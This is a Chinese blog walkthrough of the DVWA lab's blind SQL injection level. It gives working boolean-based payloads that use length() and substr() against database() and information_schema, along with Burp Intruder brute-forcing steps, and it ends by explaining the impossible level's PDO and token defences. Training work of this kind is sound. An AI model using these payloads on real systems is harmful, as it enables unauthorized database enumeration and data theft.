dvwa靶场通关(八)

最新推荐文章于 2024-02-23 03:56:31 发布
最新推荐文章于 2024-02-23 03:56:31 发布
阅读量460 收藏
点赞数
分类专栏: dvwa通关 文章标签: web安全 网络安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65950075/article/details/131382733
版权

第八关:SQL Injection (Blind)

low

这一关是盲注, 所以不能用联合查询了,只能靠一点一点手动盲猜了

 这里用到length和substr函数

先猜数据库名长度

 1' and length(database())=1#

 用bp抓包,发送到爆破

 选择攻击位置

 库名长度应该不会超过五十,所以设置从1到50,增量1

 可以知道,库名长度就是4

知道了长度, 然后就是爆出库名

1' and substr((select database()),1,1)='a'#

 同样的方法爆破库名的第一个字母是d

 直接选择这两个攻击位置会更快,

1' and substr((select database()),$1$,1)='$a$'#

得出库名为dvwa

 接下来猜表名长度

 1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=1#

 得出长度为15,其中包括了逗号,因为group_concat是用逗号把各个表名连接起来的

 接着爆破表名

1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='a'#

 得出表名有:guestbook,users

 然后是爆出列名

1' and length((select group_concat(column_name) from information_schema.columns where table_name='users'))=1#

1' and substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,1)='a'#

 medium

下拉表单,选择一个数,用burp suite抓包,

 修改id的参数id=1 and 1=1 存在

 id=1 and 1=2,不存在,说明是数字型

 根据low我们已经知道数据库名叫dvwa了,长度为4,我们验证一下,没错

 

 high

输入1 and 1=1, 存在

 输入1 and 1=2,也存在,说明不是数字型

 输入1' and 1=1#,存在

输入1' and 1=2#,不存在,说明是字符型

 验证数据库名长度为4,与上面的操作相同

 

 

impossible

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入;

同时只有返回的查询结果数量为1时,才会输出;

利用is_numeric($id)函数来判断输入的id是否是数字or数字字符串,满足条件才知晓query查询语句,

Anti-CSRF token机制的加入了进一步提高了安全性,session_token是随机生成的动态值,每次向服务器请求,客户端都会携带最新从服务端已下发的session_token值向服务器请求作匹配验证,相互匹配才会验证通过

幕溪WM
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA】--- sql盲注(SQL Injection Blind)
qq_43168364的博客
05-31 657
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 注入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔盲注,接下来判断注入类型 这里是字符型注入点字符型注入点 判断库长度,命令:1' and length(database())=4 # 判断库,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
DVWA靶场通关实战
qaq517384的博客
11-28 1961
Brute Force Command Injection CSRF File Inclusion File Upload Insecure CAPTCHA SQL Injection SQL Injection Weak Session IDs XSS (DOM) XSS(Reflected) XSS(Stored) CSP Bypass JavaScript
DVWASQL Injection Blind(SQL盲注)
RexHa的博客
10-04 2185
DVWA sql盲注
DVWASQL Injection (Blind)
weixin_42075643的博客
02-19 501
SQL Injection(Blind)即SQL盲注,一般注入,hacker可以在页面上看到回显内容,以此判断注入是否成功,而盲注是看不到回显的,甚至无法判断SQL语句是否执行,因此盲注的困难程度比一般注入要难得多。并且随着技术的提升,目前所见的站点大多都是盲注,所以好好掌握吧~ 手工盲注可以提高盲注思维,并且大量的盲注经验才会在以后的渗透之路上越行越远。 这里引用下freebuf大佬的文章内容: 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”.
SQL注入攻击的原理、分类和防御方法
热门推荐
Andrew的博客
02-27 1万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
DVWASQL Injection(Blind)
谢公子的博客
08-05 2725
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
DVWA靶场通关(2023)
2301_80548709的博客
02-23 1750
1.这道题是破用户,以及密码,其实就是通过burp软件来破抓包成功!接下来破修改这两个值,进行破,正确导入字典后,开始破.因为已经知道了答案,我们可以让破的数量少一点,找到数量不一致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
dvwa靶场通关sql injection
07-19
dvwa靶场通关sql injection
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
DVWA靶场源码分享
12-11
学习使用,大家一起进步,此资源是为了无法在github上临时下载的同学分享,以备用,不需要积分,如果被调整了积分请联系UP主
dvwa靶场训练.rar
03-17
DVWA靶场,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析
DVWA靶场搭建与使用
09-02
DVWA靶场搭建
DVWA靶场安装教学
06-08
DVWA靶场安装教学 DVWA(Damn Vulnerable Web Application)是一款开源的Web应用程序漏洞测试平台,旨在帮助开发者和安全研究人员学习和实践Web应用程序安全测试。DVWA靶场安装教学是学习Web应用程序安全测试的不二...
DVWA靶场环境的部署
最新发布
06-07
DVWA靶场环境的部署
DVWA通关--SQL盲注(SQL Injection(Blind))
箭雨镜屋
07-11 2105
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
2019-3-7 dvwa学习(8)--SQL Injection(blind) SQL盲注--基于布尔和基于时间
weixin_42555985的博客
03-07 1152
什么是SQL盲注? SQL盲注也是sql注入攻击,但是攻击者在注入的页面上看不到注入代码(sql)的实际执行结果。具有漏洞的页面不会显示数据,但是会根据注入恶意代码(逻辑条件)的执行结果显示不同的页面。 这种类型的攻击通常被认为是时间密集型( time-intensive )或者说基于时间的。因为攻击者是依靠向数据库询问一系列正确或错误的问题来窃取数据,所以攻击可能会包含很多不成功的请求,需要不断...
DVWA靶场通关记录
2301_80337881的博客
02-21 1021
这个难度我们可以直接用burp抓包破,这里我们假装知道用户为admin然后去破密码(只是少了一遍重复过程)。然后我们输入用户和随便输个密码,接下来用burp抓包,,然后发送到intruer,我们然后选定要破的区域(密码),然后设置字典和线程接着就该开始破了,然后我们就能找到密码了就是password。
dvwa靶场,里面也有xss靶场
09-24
我的连接数据库用户是root,密码是123456,自己的不一样的话,在DVWA-master\config目录下config.inc.php文件内修改自己的密码。
dvwa靶场通关教程
07-28
当然,下面是一些关于DVWA靶场通关的指南: 1. 获取DVWA:首先,你需要下载和安装DVWA(Damn Vulnerable Web Application)。你可以在官方网站上找到最新版本的下载链接。 2. 配置DVWA:安装完成后,你需要进行一些配置。打开DVWA的安装页面,在那里你可以设置数据库连接等信息。确保你已经正确设置了所有必要的配置项。 3. 注册和登录:完成配置后,你需要注册一个新用户并登录DVWA。默认情况下,用户是admin,密码是password。请尽快修改密码以确保安全性。 4. 熟悉靶场DVWA提供了多个不同安全级别的漏洞和挑战。你可以从低级别开始,逐渐提高难度。熟悉每个漏洞类型,了解其背后的原理和攻击方式。 5. 攻击和解决漏洞:使用各种技术和工具来攻击DVWA中的漏洞。例如,你可以尝试使用SQL注入、跨站脚本(XSS)、文件上传漏洞等进行攻击。在攻击过程中,了解攻击原理并尝试解决这些漏洞。 6. 学习和改进:参考文档、教程和其他资源来学习有关DVWA漏洞和安全性的更多知识。尝试不同的攻击方法,并思考如何防止这些攻击。 请注意,在进行DVWA靶场的攻击和解决漏洞时,务必遵守法律和道德规范。只在合法的环境中进行实践,并始终保持对系统和数据的尊重。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值